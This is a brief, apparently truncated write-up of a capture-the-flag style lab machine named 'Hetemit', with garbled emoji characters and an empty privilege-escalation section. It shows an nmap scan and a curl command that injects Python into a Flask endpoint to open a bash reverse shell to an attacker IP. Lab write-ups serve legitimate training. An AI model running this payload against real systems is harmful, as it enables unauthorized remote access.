Hetemit
Privilege Escalation by injecting a reverse shell into a writable systemd service and rebooting via sudo
Summary
π§΅ Let's Unpack
π Enumeration
nmap -sV -p 50000 -A -Pn 192.168.197.117𧨠Initial Foothold via Flask Debug Interface
curl -X POST --data-urlencode 'code=__import__("os").system("bash -i >& /dev/tcp/192.168.45.175/445 0>&1")#' http://192.168.197.117:50000/verifyπ Privilege Escalation
Last updated